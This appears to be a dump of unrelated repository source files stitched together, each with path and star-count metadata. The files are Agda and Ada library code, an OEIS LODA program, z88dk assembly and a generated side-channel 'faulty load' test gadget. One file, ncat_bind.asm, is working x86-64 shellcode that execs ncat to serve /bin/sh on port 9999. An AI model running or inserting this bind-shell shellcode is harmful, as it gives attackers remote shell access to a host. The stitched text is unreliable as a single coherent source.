{-# OPTIONS --cubical --safe #-} module Categories.Product where open import Prelude hiding (_×_) open import Categories module _ {ℓ₁ ℓ₂} (C : Category ℓ₁ ℓ₂) where open Category C module _ (X Y : Ob) where record Product : Type (ℓ₁ ℓ⊔ ℓ₂) where field obj : Ob proj₁ : C [ obj , X ] proj₂ : C [ obj , Y ] ump : (f : C [ Z , X ]) (g : C [ Z , Y ]) → ∃![ f×g ] ((C [ proj₁ ∘ f×g ] ≡ f) Prelude.× (C [ proj₂ ∘ f×g ] ≡ g)) _P[_×_] : ∀ {Z} → (π₁ : C [ Z , X ]) (π₂ : C [ Z , Y ]) → C [ Z , obj ] _P[_×_] π₁ π₂ = fst (ump π₁ π₂) record HasProducts : Type (ℓ₁ ℓ⊔ ℓ₂) where field product : (X Y : Ob) → Product X Y _×_ : Ob → Ob → Ob A × B = Product.obj (product A B) module _ {A A′ B B′ : Ob} where open Product using (_P[_×_]) open Product (product A B) hiding (_P[_×_]) _|×|_ : C [ A , A′ ] → C [ B , B′ ] → C [ Product.obj (product A B) , Product.obj (product A′ B′) ] f |×| g = product A′ B′ P[ C [ f ∘ proj₁ ] × C [ g ∘ proj₂ ] ]

tools-src/gnu/gcc/gcc/ada/s-tasuti.adb

enfoTek/tomato.linksys.e2000.nvram-mod

80

28896

------------------------------------------------------------------------------ -- -- -- GNU ADA RUN-TIME LIBRARY (GNARL) COMPONENTS -- -- -- -- S Y S T E M . T A S K I N G . U T I L I T I E S -- -- -- -- B o d y -- -- -- -- $Revision$ -- -- -- Copyright (C) 1991-2001, Florida State University -- -- -- -- GNARL is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 2, or (at your option) any later ver- -- -- sion. GNARL is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -- -- for more details. You should have received a copy of the GNU General -- -- Public License distributed with GNARL; see file COPYING. If not, write -- -- to the Free Software Foundation, 59 Temple Place - Suite 330, Boston, -- -- MA 02111-1307, USA. -- -- -- -- As a special exception, if other files instantiate generics from this -- -- unit, or you link this unit with other files to produce an executable, -- -- this unit does not by itself cause the resulting executable to be -- -- covered by the GNU General Public License. This exception does not -- -- however invalidate any other reasons why the executable file might be -- -- covered by the GNU Public License. -- -- -- -- GNARL was developed by the GNARL team at Florida State University. It is -- -- now maintained by Ada Core Technologies Inc. in cooperation with Florida -- -- State University (http://www.gnat.com). -- -- -- ------------------------------------------------------------------------------ -- This package provides RTS Internal Declarations. -- These declarations are not part of the GNARLI pragma Polling (Off); -- Turn off polling, we do not want ATC polling to take place during -- tasking operations. It causes infinite loops and other problems. with System.Tasking.Debug; -- used for Known_Tasks with System.Task_Primitives.Operations; -- used for Write_Lock -- Set_Priority -- Wakeup -- Unlock -- Sleep -- Abort_Task -- Lock/Unlock_All_Tasks_List with System.Tasking.Initialization; -- Used for Defer_Abort -- Undefer_Abort -- Locked_Abort_To_Level with System.Tasking.Queuing; -- used for Dequeue_Call -- Dequeue_Head with System.Tasking.Debug; -- used for Trace with Unchecked_Conversion; package body System.Tasking.Utilities is package STPO renames System.Task_Primitives.Operations; use System.Tasking.Debug; use System.Task_Primitives; use System.Task_Primitives.Operations; procedure Locked_Abort_To_Level (Self_Id : Task_ID; T : Task_ID; L : ATC_Level) renames Initialization.Locked_Abort_To_Level; procedure Defer_Abort (Self_Id : Task_ID) renames System.Tasking.Initialization.Defer_Abort; procedure Defer_Abort_Nestable (Self_Id : Task_ID) renames System.Tasking.Initialization.Defer_Abort_Nestable; procedure Undefer_Abort (Self_Id : Task_ID) renames System.Tasking.Initialization.Undefer_Abort; procedure Undefer_Abort_Nestable (Self_Id : Task_ID) renames System.Tasking.Initialization.Undefer_Abort_Nestable; procedure Wakeup_Entry_Caller (Self_Id : Task_ID; Entry_Call : Entry_Call_Link; New_State : Entry_Call_State) renames Initialization.Wakeup_Entry_Caller; ---------------- -- Abort_Task -- ---------------- -- Similar to Locked_Abort_To_Level (Self_ID, T, 0), but: -- (1) caller should be holding no locks -- (2) may be called for tasks that have not yet been activated -- (3) always aborts whole task procedure Abort_One_Task (Self_ID : Task_ID; T : Task_ID) is begin Write_Lock (T); if T.Common.State = Unactivated then T.Common.Activator := null; T.Common.State := Terminated; T.Callable := False; Cancel_Queued_Entry_Calls (T); elsif T.Common.State /= Terminated then Locked_Abort_To_Level (Self_ID, T, 0); end if; Unlock (T); end Abort_One_Task; ----------------- -- Abort_Tasks -- ----------------- -- Compiler interface only: Do not call from within the RTS, -- except in the implementation of Ada.Task_Identification. -- This must be called to implement the abort statement. -- Much of the actual work of the abort is done by the abortee, -- via the Abort_Handler signal handler, and propagation of the -- Abort_Signal special exception. procedure Abort_Tasks (Tasks : Task_List) is Self_Id : constant Task_ID := STPO.Self; C : Task_ID; P : Task_ID; begin -- ???? -- Since this is a "potentially blocking operation", we should -- add a separate check here that we are not inside a protected -- operation. Defer_Abort_Nestable (Self_Id); -- ????? -- Really should not be nested deferral here. -- Patch for code generation error that defers abort before -- evaluating parameters of an entry call (at least, timed entry -- calls), and so may propagate an exception that causes abort -- to remain undeferred indefinitely. See C97404B. When all -- such bugs are fixed, this patch can be removed. for J in Tasks'Range loop C := Tasks (J); Abort_One_Task (Self_Id, C); end loop; Lock_All_Tasks_List; C := All_Tasks_List; while C /= null loop if C.Pending_ATC_Level > 0 then P := C.Common.Parent; while P /= null loop if P.Pending_ATC_Level = 0 then Abort_One_Task (Self_Id, C); exit; end if; P := P.Common.Parent; end loop; end if; C := C.Common.All_Tasks_Link; end loop; Unlock_All_Tasks_List; Undefer_Abort_Nestable (Self_Id); end Abort_Tasks; ------------------------------- -- Cancel_Queued_Entry_Calls -- ------------------------------- -- Cancel any entry calls queued on target task. Call this only while -- holding T locked, and nothing more. This should only be called by T, -- unless T is a terminated previously unactivated task. procedure Cancel_Queued_Entry_Calls (T : Task_ID) is Next_Entry_Call : Entry_Call_Link; Entry_Call : Entry_Call_Link; Caller : Task_ID; Level : Integer; Self_Id : constant Task_ID := STPO.Self; begin pragma Assert (T = Self or else T.Common.State = Terminated); for J in 1 .. T.Entry_Num loop Queuing.Dequeue_Head (T.Entry_Queues (J), Entry_Call); while Entry_Call /= null loop -- Leave Entry_Call.Done = False, since this is cancelled Caller := Entry_Call.Self; Entry_Call.Exception_To_Raise := Tasking_Error'Identity; Queuing.Dequeue_Head (T.Entry_Queues (J), Next_Entry_Call); Level := Entry_Call.Level - 1; Unlock (T); Write_Lock (Entry_Call.Self); Wakeup_Entry_Caller (Self_Id, Entry_Call, Cancelled); Unlock (Entry_Call.Self); Write_Lock (T); Entry_Call.State := Done; Entry_Call := Next_Entry_Call; end loop; end loop; end Cancel_Queued_Entry_Calls; ------------------------ -- Exit_One_ATC_Level -- ------------------------ -- Call only with abort deferred and holding lock of Self_Id. -- This is a bit of common code for all entry calls. -- The effect is to exit one level of ATC nesting. -- If we have reached the desired ATC nesting level, reset the -- requested level to effective infinity, to allow further calls. -- In any case, reset Self_Id.Aborting, to allow re-raising of -- Abort_Signal. procedure Exit_One_ATC_Level (Self_ID : Task_ID) is begin Self_ID.ATC_Nesting_Level := Self_ID.ATC_Nesting_Level - 1; pragma Debug (Debug.Trace (Self_ID, "EOAL: exited to ATC level: " & ATC_Level'Image (Self_ID.ATC_Nesting_Level), 'A')); pragma Assert (Self_ID.ATC_Nesting_Level >= 1); if Self_ID.Pending_ATC_Level < ATC_Level_Infinity then if Self_ID.Pending_ATC_Level = Self_ID.ATC_Nesting_Level then Self_ID.Pending_ATC_Level := ATC_Level_Infinity; Self_ID.Aborting := False; else -- Force the next Undefer_Abort to re-raise Abort_Signal pragma Assert (Self_ID.Pending_ATC_Level < Self_ID.ATC_Nesting_Level); if Self_ID.Aborting then Self_ID.ATC_Hack := True; Self_ID.Pending_Action := True; end if; end if; end if; end Exit_One_ATC_Level; ---------------------- -- Make_Independent -- ---------------------- -- Move the current task to the outermost level (level 2) of the master -- hierarchy of the environment task. That is one level further out -- than normal tasks defined in library-level packages (level 3). The -- environment task will wait for level 3 tasks to terminate normally, -- then it will abort all the level 2 tasks. See Finalize_Global_Tasks -- procedure for more information. -- This is a dangerous operation, and should only be used on nested tasks -- or tasks that depend on any objects that might be finalized earlier than -- the termination of the environment task. It is for internal use by the -- GNARL, to prevent such internal server tasks from preventing a partition -- from terminating. -- Also note that the run time assumes that the parent of an independent -- task is the environment task. If this is not the case, Make_Independent -- will change the task's parent. This assumption is particularly -- important for master level completion and for the computation of -- Independent_Task_Count. -- See procedures Init_RTS and Finalize_Global_Tasks for related code. procedure Make_Independent is Self_Id : constant Task_ID := STPO.Self; Environment_Task : constant Task_ID := STPO.Environment_Task; Parent : constant Task_ID := Self_Id.Common.Parent; Parent_Needs_Updating : Boolean := False; begin if Self_Id.Known_Tasks_Index /= -1 then Known_Tasks (Self_Id.Known_Tasks_Index) := null; end if; Defer_Abort (Self_Id); Write_Lock (Environment_Task); Write_Lock (Self_Id); pragma Assert (Parent = Environment_Task or else Self_Id.Master_of_Task = Library_Task_Level); Self_Id.Master_of_Task := Independent_Task_Level; -- The run time assumes that the parent of an independent task is the -- environment task. if Parent /= Environment_Task then -- We can not lock three tasks at the same time, so defer the -- operations on the parent. Parent_Needs_Updating := True; Self_Id.Common.Parent := Environment_Task; end if; -- Update Independent_Task_Count that is needed for the GLADE -- termination rule. See also pending update in -- System.Tasking.Stages.Check_Independent Independent_Task_Count := Independent_Task_Count + 1; Unlock (Self_Id); -- Changing the parent after creation is not trivial. Do not forget -- to update the old parent counts, and the new parent (i.e. the -- Environment_Task) counts. if Parent_Needs_Updating then Write_Lock (Parent); Parent.Awake_Count := Parent.Awake_Count - 1; Parent.Alive_Count := Parent.Alive_Count - 1; Environment_Task.Awake_Count := Environment_Task.Awake_Count + 1; Environment_Task.Alive_Count := Environment_Task.Alive_Count + 1; Unlock (Parent); end if; Unlock (Environment_Task); Undefer_Abort (Self_Id); end Make_Independent; ------------------ -- Make_Passive -- ------------------ -- Update counts to indicate current task is either terminated -- or accepting on a terminate alternative. Call holding no locks. procedure Make_Passive (Self_ID : Task_ID; Task_Completed : Boolean) is C : Task_ID := Self_ID; P : Task_ID := C.Common.Parent; Master_Completion_Phase : Integer; begin if P /= null then Write_Lock (P); end if; Write_Lock (C); if Task_Completed then Self_ID.Common.State := Terminated; if Self_ID.Awake_Count = 0 then -- We are completing via a terminate alternative. -- Our parent should wait in Phase 2 of Complete_Master. Master_Completion_Phase := 2; pragma Assert (Task_Completed); pragma Assert (Self_ID.Terminate_Alternative); pragma Assert (Self_ID.Alive_Count = 1); else -- We are NOT on a terminate alternative. -- Our parent should wait in Phase 1 of Complete_Master. Master_Completion_Phase := 1; pragma Assert (Self_ID.Awake_Count = 1); end if; -- We are accepting with a terminate alternative. else if Self_ID.Open_Accepts = null then -- Somebody started a rendezvous while we had our lock open. -- Skip the terminate alternative. Unlock (C); if P /= null then Unlock (P); end if; return; end if; Self_ID.Terminate_Alternative := True; Master_Completion_Phase := 0; pragma Assert (Self_ID.Terminate_Alternative); pragma Assert (Self_ID.Awake_Count >= 1); end if; if Master_Completion_Phase = 2 then -- Since our Awake_Count is zero but our Alive_Count -- is nonzero, we have been accepting with a terminate -- alternative, and we now have been told to terminate -- by a completed master (in some ancestor task) that -- is waiting (with zero Awake_Count) in Phase 2 of -- Complete_Master. pragma Debug (Debug.Trace (Self_ID, "Make_Passive: Phase 2", 'M')); pragma Assert (P /= null); C.Alive_Count := C.Alive_Count - 1; if C.Alive_Count > 0 then Unlock (C); Unlock (P); return; end if; -- C's count just went to zero, indicating that -- all of C's dependents are terminated. -- C has a parent, P. loop -- C's count just went to zero, indicating that all of C's -- dependents are terminated. C has a parent, P. Notify P that -- C and its dependents have all terminated. P.Alive_Count := P.Alive_Count - 1; exit when P.Alive_Count > 0; Unlock (C); Unlock (P); C := P; P := C.Common.Parent; -- Environment task cannot have terminated yet pragma Assert (P /= null); Write_Lock (P); Write_Lock (C); end loop; pragma Assert (P.Awake_Count /= 0); if P.Common.State = Master_Phase_2_Sleep and then C.Master_of_Task = P.Master_Within then pragma Assert (P.Common.Wait_Count > 0); P.Common.Wait_Count := P.Common.Wait_Count - 1; if P.Common.Wait_Count = 0 then Wakeup (P, Master_Phase_2_Sleep); end if; end if; Unlock (C); Unlock (P); return; end if; -- We are terminating in Phase 1 or Complete_Master, -- or are accepting on a terminate alternative. C.Awake_Count := C.Awake_Count - 1; if Task_Completed then pragma Assert (Self_ID.Awake_Count = 0); C.Alive_Count := C.Alive_Count - 1; end if; if C.Awake_Count > 0 or else P = null then Unlock (C); if P /= null then Unlock (P); end if; return; end if; -- C's count just went to zero, indicating that all of C's -- dependents are terminated or accepting with terminate alt. -- C has a parent, P. loop -- Notify P that C has gone passive. P.Awake_Count := P.Awake_Count - 1; if Task_Completed and then C.Alive_Count = 0 then P.Alive_Count := P.Alive_Count - 1; end if; exit when P.Awake_Count > 0; Unlock (C); Unlock (P); C := P; P := C.Common.Parent; if P = null then return; end if; Write_Lock (P); Write_Lock (C); end loop; -- P has non-passive dependents. if P.Common.State = Master_Completion_Sleep and then C.Master_of_Task = P.Master_Within then pragma Debug (Debug.Trace (Self_ID, "Make_Passive: Phase 1, parent waiting", 'M')); -- If parent is in Master_Completion_Sleep, it -- cannot be on a terminate alternative, hence -- it cannot have Awake_Count of zero. pragma Assert (P.Common.Wait_Count > 0); P.Common.Wait_Count := P.Common.Wait_Count - 1; if P.Common.Wait_Count = 0 then Wakeup (P, Master_Completion_Sleep); end if; else pragma Debug (Debug.Trace (Self_ID, "Make_Passive: Phase 1, parent awake", 'M')); null; end if; Unlock (C); Unlock (P); end Make_Passive; end System.Tasking.Utilities;

other.7z/SFC.7z/SFC/ソースデータ/ゼルダの伝説神々のトライフォース/日本_Ver3/asm/zel_sut2.asm

prismotizm/gigaleak

0

1513

Name: zel_sut2.asm Type: file Size: 67030 Last-Modified: '2016-05-13T04:36:32Z' SHA-1: 8C192699ADEF5792559F437FD0000F5D925ACC5C Description: null

oeis/022/A022405.asm

neoneye/loda-programs

11

99586

<gh_stars>10-100 ; A022405: a(n) = a(n-1)*a(n-2) - a(n-3), with a(1) = 0, a(2) = 1, a(3) = 2. ; Submitted by <NAME> ; 0,1,2,2,3,4,10,37,366,13532,4952675,67019597734,331926286207224918,22245566178948766568816183137,7383888166355511098764350563784314022618210032,164258772862618181462691390833789348539465093269150451212405503507035405466,1212868409160364150700880809778324493557128541620205374456628316922939710724718689754314870081998500456550947921452651775 mov $2,-1 lpb $0 sub $0,1 mov $5,$1 add $1,2 sub $4,$2 sub $3,$4 mov $2,$3 mov $3,$5 sub $3,$2 sub $1,$3 mul $2,$5 lpe mov $0,$1

tools/scitools/conf/understand/ada/ada05/a-stzmap.ads

brucegua/moocos

1

2928

<gh_stars>1-10 ------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- A D A . S T R I N G S . W I D E _ W I D E _ M A P S -- -- -- -- S p e c -- -- -- -- Copyright (C) 1992-2006, Free Software Foundation, Inc. -- -- -- -- This specification is derived from the Ada Reference Manual for use with -- -- GNAT. The copyright notice above, and the license provisions that follow -- -- apply solely to the contents of the part following the private keyword. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 2, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -- -- for more details. You should have received a copy of the GNU General -- -- Public License distributed with GNAT; see file COPYING. If not, write -- -- to the Free Software Foundation, 51 Franklin Street, Fifth Floor, -- -- Boston, MA 02110-1301, USA. -- -- -- -- -- -- -- -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ with Ada.Finalization; package Ada.Strings.Wide_Wide_Maps is pragma Preelaborate; ------------------------------------------ -- Wide_Wide_Character Set Declarations -- ------------------------------------------ type Wide_Wide_Character_Set is private; pragma Preelaborable_Initialization (Wide_Wide_Character_Set); -- Representation for a set of Wide_Wide_Character values: Null_Set : constant Wide_Wide_Character_Set; ----------------------------------------------- -- Constructors for Wide_Wide_Character Sets -- ----------------------------------------------- type Wide_Wide_Character_Range is record Low : Wide_Wide_Character; High : Wide_Wide_Character; end record; -- Represents Wide_Wide_Character range Low .. High type Wide_Wide_Character_Ranges is array (Positive range <>) of Wide_Wide_Character_Range; function To_Set (Ranges : Wide_Wide_Character_Ranges) return Wide_Wide_Character_Set; function To_Set (Span : Wide_Wide_Character_Range) return Wide_Wide_Character_Set; function To_Ranges (Set : Wide_Wide_Character_Set) return Wide_Wide_Character_Ranges; --------------------------------------- -- Operations on Wide Character Sets -- --------------------------------------- function "=" (Left, Right : Wide_Wide_Character_Set) return Boolean; function "not" (Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "and" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "or" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "xor" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function "-" (Left, Right : Wide_Wide_Character_Set) return Wide_Wide_Character_Set; function Is_In (Element : Wide_Wide_Character; Set : Wide_Wide_Character_Set) return Boolean; function Is_Subset (Elements : Wide_Wide_Character_Set; Set : Wide_Wide_Character_Set) return Boolean; function "<=" (Left : Wide_Wide_Character_Set; Right : Wide_Wide_Character_Set) return Boolean renames Is_Subset; subtype Wide_Wide_Character_Sequence is Wide_Wide_String; -- Alternative representation for a set of character values function To_Set (Sequence : Wide_Wide_Character_Sequence) return Wide_Wide_Character_Set; function To_Set (Singleton : Wide_Wide_Character) return Wide_Wide_Character_Set; function To_Sequence (Set : Wide_Wide_Character_Set) return Wide_Wide_Character_Sequence; ---------------------------------------------- -- Wide_Wide_Character Mapping Declarations -- ---------------------------------------------- type Wide_Wide_Character_Mapping is private; pragma Preelaborable_Initialization (Wide_Wide_Character_Mapping); -- Representation for a wide character to wide character mapping: function Value (Map : Wide_Wide_Character_Mapping; Element : Wide_Wide_Character) return Wide_Wide_Character; Identity : constant Wide_Wide_Character_Mapping; -------------------------------------- -- Operations on Wide Wide Mappings -- --------------------------------------- function To_Mapping (From, To : Wide_Wide_Character_Sequence) return Wide_Wide_Character_Mapping; function To_Domain (Map : Wide_Wide_Character_Mapping) return Wide_Wide_Character_Sequence; function To_Range (Map : Wide_Wide_Character_Mapping) return Wide_Wide_Character_Sequence; type Wide_Wide_Character_Mapping_Function is access function (From : Wide_Wide_Character) return Wide_Wide_Character; private package AF renames Ada.Finalization; ----------------------------------------------- -- Representation of Wide_Wide_Character_Set -- ----------------------------------------------- -- A wide character set is represented as a sequence of wide character -- ranges (i.e. an object of type Wide_Wide_Character_Ranges) in which the -- following hold: -- The lower bound is 1 -- The ranges are in order by increasing Low values -- The ranges are non-overlapping and discontigous -- A character value is in the set if it is contained in one of the -- ranges. The actual Wide_Wide_Character_Set value is a controlled pointer -- to this Wide_Wide_Character_Ranges value. The use of a controlled type -- is necessary to prevent storage leaks. type Wide_Wide_Character_Ranges_Access is access all Wide_Wide_Character_Ranges; type Wide_Wide_Character_Set is new AF.Controlled with record Set : Wide_Wide_Character_Ranges_Access; end record; pragma Finalize_Storage_Only (Wide_Wide_Character_Set); -- This avoids useless finalizations, and, more importantly avoids -- incorrect attempts to finalize constants that are statically -- declared here and in Ada.Strings.Wide_Wide_Maps, which is incorrect. procedure Initialize (Object : in out Wide_Wide_Character_Set); procedure Adjust (Object : in out Wide_Wide_Character_Set); procedure Finalize (Object : in out Wide_Wide_Character_Set); Null_Range : aliased constant Wide_Wide_Character_Ranges := (1 .. 0 => (Low => ' ', High => ' ')); Null_Set : constant Wide_Wide_Character_Set := (AF.Controlled with Set => Null_Range'Unrestricted_Access); --------------------------------------------------- -- Representation of Wide_Wide_Character_Mapping -- --------------------------------------------------- -- A wide character mapping is represented as two strings of equal -- length, where any character appearing in Domain is mapped to the -- corresponding character in Rangev. A character not appearing in -- Domain is mapped to itself. The characters in Domain are sorted -- in ascending order. -- The actual Wide_Wide_Character_Mapping value is a controlled record -- that contains a pointer to a discriminated record containing the -- range and domain values. -- Note: this representation is canonical, and the values stored in -- Domain and Rangev are exactly the values that are returned by the -- functions To_Domain and To_Range. The use of a controlled type is -- necessary to prevent storage leaks. type Wide_Wide_Character_Mapping_Values (Length : Natural) is record Domain : Wide_Wide_Character_Sequence (1 .. Length); Rangev : Wide_Wide_Character_Sequence (1 .. Length); end record; type Wide_Wide_Character_Mapping_Values_Access is access all Wide_Wide_Character_Mapping_Values; type Wide_Wide_Character_Mapping is new AF.Controlled with record Map : Wide_Wide_Character_Mapping_Values_Access; end record; pragma Finalize_Storage_Only (Wide_Wide_Character_Mapping); -- This avoids useless finalizations, and, more importantly avoids -- incorrect attempts to finalize constants that are statically -- declared here and in Ada.Strings.Wide_Wide_Maps, which is incorrect. procedure Initialize (Object : in out Wide_Wide_Character_Mapping); procedure Adjust (Object : in out Wide_Wide_Character_Mapping); procedure Finalize (Object : in out Wide_Wide_Character_Mapping); Null_Map : aliased constant Wide_Wide_Character_Mapping_Values := (Length => 0, Domain => "", Rangev => ""); Identity : constant Wide_Wide_Character_Mapping := (AF.Controlled with Map => Null_Map'Unrestricted_Access); end Ada.Strings.Wide_Wide_Maps;

samples/ncat_bind.asm

0x00-0x00/shellcoding

0

18662

global _start: _start: xor rdi, rdi;zera o rdi xor rsi, rsi ;zera o rsi xor rax, rax ;zera o rax push rdi ; stack = 0 0 pop rdx ; rdx = 0 | stack = NULL mov rax, 0x68732f4141414141 ; move hs/ no rax shr rax, 0x28 ;insere null byte no primeiro A push rax mov rax, 0x6e69622f20652d20 ;move nib/ -e rax push rax mov rax, 0x3939393920706c2d ;move 9999 pl- push rax push rsp ;puxa o endereco da string na stack pop rsi ;guarda o endereco do argumento no rsi mov rdi, 0x7461636e2f414141 ; move At no registro rdi shr rdi, 0x18 push rdi; move rdi no stack | stack = 0xAAAAAAAt mov rdi, 0x6e69622f7273752f ; move acn/nib/ no registro rdi push rdi ; empurra endereco do rdi na stack | stack = 0xAAAAAAAAt, 0xacn/nib/ push rsp ; puxa stack pointer pra stack pop rdi ; pega o ponteiro do stack pointer (o comeco da string) push 0x3b pop rax syscall

libsrc/_DEVELOPMENT/adt/p_forward_list_alt/c/sdcc_iy/p_forward_list_alt_remove_after.asm

jpoikela/z88dk

640

160229

<gh_stars>100-1000 ; void *p_forward_list_alt_remove_after(p_forward_list_alt_t *list, void *list_item) SECTION code_clib SECTION code_adt_p_forward_list_alt PUBLIC _p_forward_list_alt_remove_after EXTERN asm_p_forward_list_alt_remove_after _p_forward_list_alt_remove_after: pop af pop bc pop hl push hl push bc push af jp asm_p_forward_list_alt_remove_after

Transynther/x86/_processed/AVXALIGN/_zr_/i7-8650U_0xd2.log_1378_1186.asm

ljhsiun2/medusa

9

20776

.global s_prepare_buffers s_prepare_buffers: push %r10 push %r14 push %r15 push %r8 push %r9 push %rcx push %rdi lea addresses_A_ht+0x1678b, %r10 dec %r9 movb $0x61, (%r10) nop nop nop nop nop add %r14, %r14 lea addresses_normal_ht+0x140ab, %r15 nop dec %rdi mov (%r15), %r8w nop dec %rcx lea addresses_WC_ht+0xdeb, %r15 xor $48035, %r10 movw $0x6162, (%r15) nop nop nop nop cmp $24613, %r10 pop %rdi pop %rcx pop %r9 pop %r8 pop %r15 pop %r14 pop %r10 ret .global s_faulty_load s_faulty_load: push %r10 push %r13 push %r15 push %rax push %rbx push %rcx push %rdi // Store lea addresses_A+0x1c536, %r13 clflush (%r13) nop nop nop nop xor $13052, %rbx mov $0x5152535455565758, %r15 movq %r15, %xmm0 vmovups %ymm0, (%r13) cmp $40494, %rax // Store lea addresses_normal+0x1f1eb, %r10 nop nop nop nop xor %r15, %r15 mov $0x5152535455565758, %rax movq %rax, %xmm0 vmovups %ymm0, (%r10) nop inc %r10 // Store lea addresses_WC+0x18cc3, %r10 nop nop cmp $15201, %rdi mov $0x5152535455565758, %r13 movq %r13, (%r10) nop nop nop nop add $46265, %rcx // Faulty Load lea addresses_US+0x4deb, %r10 nop nop nop nop nop cmp %r13, %r13 movntdqa (%r10), %xmm6 vpextrq $0, %xmm6, %rax lea oracles, %rcx and $0xff, %rax shlq $12, %rax mov (%rcx,%rax,1), %rax pop %rdi pop %rcx pop %rbx pop %rax pop %r15 pop %r13 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': True, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}} {'00': 1378} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 